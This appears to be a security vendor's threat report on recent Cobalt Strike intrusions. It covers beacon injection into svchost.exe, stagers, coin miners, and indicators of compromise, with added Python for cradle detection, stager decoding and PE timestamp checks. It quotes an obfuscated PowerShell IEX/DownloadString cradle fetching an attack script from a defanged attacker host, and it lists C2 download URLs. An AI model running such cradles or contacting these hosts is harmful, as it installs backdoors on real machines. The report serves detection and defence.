The ASEC analysis team is monitoring attacks that use the Cobalt Strike hacking tool. This article examines the latest Cobalt Strike attacks confirmed since the publication of the team's earlier article introducing Cobalt Strike.
In an attack confirmed on April 23, the Cobalt Strike beacon was found running inside a process with the command line shown below. Cobalt Strike threat actors commonly launch a legitimate process with a chosen command line and then inject the actual beacon backdoor into it, so that the malicious activity appears to belong to a normal process. This is a built-in feature of Cobalt Strike (the process used is set by the spawnto option).
svchost.exe -k LocalServiceNetworkRestricted
Before the beacon process above was launched, the following obfuscated PowerShell command line was recorded.
powershell.exe "$dadf='IEX(New-Object Net.WebClient).D';$ien='ownloadString("hxxp://hcut.co[.]kr/api/runtime.ps1")';$nv3='IEX(New-Object Net.WebClient).Do';$qc='wnloadString… (omitted)
The downloaded runtime.ps1 is actually Invoke-Shellcode.ps1, a PowerShell script shipped with the PowerShell-based attack frameworks PowerSploit and Empire. As its name suggests, Invoke-Shellcode takes shellcode through a parameter, injects it into a process and executes it. It is therefore assumed that the Cobalt Strike beacon was loaded through Invoke-Shellcode.ps1.
– runtime.ps1: Invoke-Shellcode.ps1 (download URL: hxxp://hcut.co[.]kr/api/runtime.ps1)
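The two traits described above, a download cradle split into string fragments that are only concatenated at run time, and a beacon living inside a freshly spawned svchost.exe, are both visible in process-creation telemetry. The following Python is an added example, not code from the original article or from AhnLab: it resolves `$var='...'` fragments back into the full cradle and flags svchost.exe instances whose parent is not services.exe. The event records, process IDs and the example.invalid URL are constructed stand-ins; the one-liner is a shortened imitation of the truncated command line above, not its missing remainder.

```python
import re

# Constructed process-creation records in the style of Sysmon Event ID 1. The PowerShell
# one-liner imitates the truncated command line on the page (its real remainder is unknown);
# the URL is a placeholder and the PIDs are made up.
EVENTS = [
    {"pid": 4012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": ("powershell.exe \"$dadf='IEX(New-Object Net.WebClient).D';"
                 "$ien='ownloadString(\"http://example.invalid/api/runtime.ps1\")';"
                 "IEX($dadf+$ien)\"")},
    {"pid": 4100,   # beacon injected into a sacrificial svchost.exe spawned by PowerShell
     "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "svchost.exe -k LocalServiceNetworkRestricted"},
    {"pid": 900,    # a legitimate service host for comparison
     "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": "svchost.exe -k LocalServiceNetworkRestricted"},
]

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")   # $name='literal'
CONCAT_RE = re.compile(r"\$\w+(?:\s*\+\s*\$\w+)+")           # $a+$b+$c
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def resolve_concat(cmdline):
    """Rebuild strings that were split into single-quoted fragments and joined with '+'.
    Returns one reassembled string per concatenation expression found."""
    literals = {name: value.replace("''", "'") for name, value in ASSIGN_RE.findall(cmdline)}
    resolved = []
    for match in CONCAT_RE.finditer(cmdline):
        names = re.findall(r"\$(\w+)", match.group(0))
        if all(n in literals for n in names):
            resolved.append("".join(literals[n] for n in names))
    return resolved


def defang(url):
    """Render a URL so it cannot be clicked: http -> hxxp, dots in the host -> [.]"""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def triage(events):
    """Return (pid, reason, urls) findings for the two behaviours described in the article."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
        if image == "powershell.exe":
            # the raw command line never contains "DownloadString"; only the resolved text does
            for text in resolve_concat(ev["cmdline"]):
                if re.search(r"\b(iex|invoke-expression)\b", text, re.I) and "downloadstring" in text.lower():
                    urls = [defang(u) for u in URL_RE.findall(text)]
                    findings.append((ev["pid"], "split-string download cradle", urls))
        # svchost.exe is normally started by services.exe; any other parent is worth a look
        if image == "svchost.exe" and parent != "services.exe":
            findings.append((ev["pid"], f"svchost.exe spawned by {parent}", []))
    return findings


if __name__ == "__main__":
    for pid, reason, urls in triage(EVENTS):
        print(pid, reason, *urls)
```

The parent check is deliberately coarse: services.exe is the only expected parent of a real service host, so an svchost.exe started by PowerShell, a browser or an Office process is a strong signal regardless of how plausible its `-k` group looks.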
Records show that after the installation, Cobalt Strike dropped information-gathering malware and CoinMiner malware, as listed below.
– na.exe: collects hardware information
– 1.exe: XMRig CoinMiner injector (does not run correctly)
– 2.exe: XMRig CoinMiner injector (does not run correctly)
Note that the infected system had already been infected with Cobalt Strike and CoinMiner malware before this attack; the previously installed files are listed below.
– 2008.exe: Cobalt Strike Stager (beacon download URL: hxxp://103.39.108[.]20:2008/cDIl)
– 2008a.exe: Cobalt Strike Stager (beacon download URL: hxxp://103.39.108[.]20:2008/eZ5h)
– bits_se.exe: Cobalt Strike Stager (beacon download URL: hxxp://103.39.108[.]20:2008/cDIl)
– k64.src: Cobalt Strike Stager (beacon download URL: hxxp://www.pc1024[.]net:3322/NDaj)
– shellcode.dll: Cobalt Strike Stager (beacon download URL: hxxp://103.39.108[.]20:2008/yGYC)
– 51032u.exe: CoinMiner Installer
– avmi.exe: XMRig CoinMiner
– xmrig.exe: XMRig CoinMiner
– svchost.exe: NSSM Service Manager
Next is an attack confirmed on March 16. The organization where the malware was distributed appears to be an affiliate of a larger company. A PowerShell process was found attempting to execute a malicious script, %temp%\tmp5O91.ps1, in order to download the beacon.
The script Base64-decodes its embedded payload (that step is omitted here), XORs the result with 0x35, and loads the resulting shellcode into memory.
The shellcode is a Cobalt Strike 'Stager' and attempts to download the beacon from the C2 (pilottrustme[.]top, 54.238.214[.]219), whose address is stored at the very end of the shellcode. However, as the C2 could not be reached at the time of analysis, the team was unable to retrieve the beacon and check its latest configuration.
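To illustrate the decoding described above, the following Python is an added example (not the script from the incident and not AhnLab code). It reverses the Base64 and XOR 0x35 layers, and generalizes the XOR step by brute-forcing the single-byte key against known stager prologues, so the same routine works when the key is not known in advance; it then pulls the C2 host from the end of the shellcode. The shellcode bytes are a constructed stand-in (a stager-style prologue, filler, and the page's C2 host name at the end); the real tmp5O91.ps1 payload is not reproduced here.

```python
import base64

# Byte sequences that Metasploit/Cobalt Strike style stagers start with:
# x86 "cld; call" and x64 "cld; and rsp,-0x10". Used only as a heuristic.
STAGER_PROLOGUES = (b"\xfc\xe8", b"\xfc\x48\x83\xe4\xf0")

# Constructed stand-in for the shellcode: a stager-style prologue, filler bytes, and the
# C2 host from the incident as a NUL-terminated string at the very end.
SAMPLE_SHELLCODE = b"\xfc\xe8\x89\x00\x00\x00" + b"\x90" * 16 + b"pilottrustme.top\x00"
XOR_KEY = 0x35


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


# What the dropper script would embed: the shellcode XORed with 0x35, then Base64-encoded.
SAMPLE_BLOB = base64.b64encode(xor_bytes(SAMPLE_SHELLCODE, XOR_KEY)).decode("ascii")
# A control blob that is not a stager under any single-byte key.
JUNK_BLOB = base64.b64encode(b"hello world").decode("ascii")


def recover_key(blob):
    """Brute-force a single-byte XOR key: the right key makes the first bytes look like a stager."""
    for key in range(256):
        head = xor_bytes(blob[:5], key)
        if any(head.startswith(p) for p in STAGER_PROLOGUES):
            return key
    return None


def decode_stager(b64_text, key=None):
    """Reverse the Base64 + XOR layers. With key=None the key is recovered by brute force."""
    blob = base64.b64decode(b64_text)
    if key is None:
        key = recover_key(blob)
        if key is None:
            raise ValueError("no single-byte XOR key yields a known stager prologue")
    return key, xor_bytes(blob, key)


def trailing_c2(shellcode):
    """Metasploit-style stagers carry the C2 host as a NUL-terminated string at the end of
    the blob; walk back over trailing NULs and return the printable run before them."""
    end = len(shellcode)
    while end > 0 and shellcode[end - 1] == 0:
        end -= 1
    start = end
    while start > 0 and 0x20 <= shellcode[start - 1] < 0x7F:
        start -= 1
    return shellcode[start:end].decode("ascii")


def looks_like_xor_stager(b64_text):
    """True when some single-byte key turns the Base64 payload into stager-like bytes."""
    try:
        decode_stager(b64_text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    key, sc = decode_stager(SAMPLE_BLOB)
    print(f"key=0x{key:02x} len={len(sc)} c2={trailing_c2(sc)}")
```

The prologue match is a heuristic, not proof: a custom loader can trivially change the first instructions, so treat a recovered key as a lead to confirm by emulating or disassembling the decoded bytes.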
Lastly, an infection at a university in Korea was confirmed on March 26. The sample, msvcruntime.exe, had no TimeDateStamp (build time) value in its PE header. It was packed with the open-source packer 'PEzor' and ultimately executed an embedded shellcode. The shellcode executed at the end downloads the beacon; this is Cobalt Strike's 'Stager' payload.
The C2 domain that the shellcode connects to is 'oxoo[.]cc'. At the time of analysis the page could not be reached and returned '404 Not Found', so the team was unable to download the beacon and check its configuration.
AhnLab products are equipped with process-memory-based and behavior-based detection that can counter the beacon backdoor, which Cobalt Strike uses from the initial intrusion stage through internal propagation. The related detection names are as follows:
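A quick check for the missing build time, added here as an example rather than anything from the article: the COFF TimeDateStamp is read directly from the PE header without any third-party library, and a zero value (as with msvcruntime.exe) is reported as stripped. The minimal PE header used for the demonstration is constructed inline and is not a loadable image; the 1995 lower bound on plausible build dates is an assumed heuristic.

```python
import struct
import time


def read_timedatestamp(pe_bytes):
    """Read the COFF header TimeDateStamp straight from the bytes of a PE file.
    e_lfanew (DOS header offset 0x3C) points at the 4-byte 'PE\\0\\0' signature; the COFF
    file header follows it, with TimeDateStamp at offset 4 (after Machine and
    NumberOfSections), i.e. at e_lfanew + 8."""
    if len(pe_bytes) < 0x40 or pe_bytes[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe_bytes, 0x3C)[0]
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\x00\x00" or len(pe_bytes) < e_lfanew + 24:
        raise ValueError("not a PE image: missing or truncated PE header")
    return struct.unpack_from("<I", pe_bytes, e_lfanew + 8)[0]


EARLIEST_PLAUSIBLE = 788918400   # 1995-01-01 UTC; assumed cut-off for genuine build dates


def timestamp_verdict(ts, now=None):
    """Zero means the build time was stripped (as with msvcruntime.exe); a value in the
    future or before the cut-off is an implausible, likely forged, stamp."""
    now = time.time() if now is None else now
    if ts == 0:
        return "stripped"
    if ts < EARLIEST_PLAUSIBLE or ts > now + 86400:
        return "implausible"
    return "plausible"


def build_min_pe(timestamp, machine=0x8664):
    """Construct a minimal header (DOS stub, PE signature, COFF file header) for testing.
    Not a loadable image; just enough structure for the parser above."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> right after the DOS header
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 1, timestamp, 0, 0, 0, 0x22)
    return bytes(dos) + b"PE\x00\x00" + coff


def check(pe_bytes, now=None):
    """Return (timestamp, verdict) for a PE image's build time."""
    ts = read_timedatestamp(pe_bytes)
    return ts, timestamp_verdict(ts, now)


if __name__ == "__main__":
    for sample in (build_min_pe(0), build_min_pe(1616716800)):
        print(check(sample))
```

On a real file, pass `open(path, "rb").read()` to `check`; a stripped stamp on its own is only a weak indicator (some toolchains emit reproducible-build stamps), but combined with a packer such as PEzor it is worth a closer look.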
– Trojan/PowerShell.InvokeShell (2021.04.27.00)
– Infostealer/Win.Sysinfo.C4439416 (2021.04.26.03)
– CoinMiner/Win.XMRig.C4439427 (2021.04.27.00)
– Trojan/Win32.CobaltStrike.R329694 (2020.11.26.06)
– Malware/Win32.Generic.C1883131 (2017.03.27.01)
– Trojan/Win32.RL_Generic.R292199 (2019.09.20.01)
– Trojan/Win32.Wacatac.R355370 (2020.11.11.02)
– CoinMiner/Win.Agent.C4439419 (2021.04.26.03)
– Trojan/Win64.XMR-Miner.R226842 (2019.12.11.01)
– Unwanted/Win.NSSM.C4439418 (2021.04.26.03)
– Trojan/PS.Cobalt (2021.04.06.00)
– Trojan/Win.CobaltStrike.C4399063 (2021.04.01.01)
The MD5 hashes of the files described above are as follows:
– runtime.ps1 : 7facee76cab5717349fe6c2d913a1961
– na.exe : b9a376b33f6307c8c2669360ae2dae01
– 1.exe : 7f2fb6bac0ecd067cf1f183ee07bc95c
– 2.exe : d8b503bedaa4077fa566c25c6c4b8f32
– 2008.exe : ff2af38bf23d9a6b1f8da12626c5f6a4
– 2008a.exe : 9917e7ef06e7fc2761144c4abef0cdc2
– bits_se.exe : 6d853d078b9865dd3d6aba653d42083b
– k64.src : 179e60db8beeecfe14b2c1ea922e65e3
– shellcode.dll : 17730a73ffbb0e6145658783e5207d6d
– 51032u.exe : 6c1feef64ae04ce2f45b703706c43ef5
– avmi.exe : a2074ca640b5a57662622e49ac742bb1
– xmrig.exe : 0ea5d36707f6d07b82a1f9d707d4c913
– svchost.exe : 6e64c6b59e22247b0f07db49ea651cc8
– tmp5O91.ps1 : d782dd504419ef0699d65cfa8c673700
– msvcruntime.exe : f990c4df6a580794cb6fd1d4fafe64b8
URL:
– www.pc1024[.]net:3322/NDaj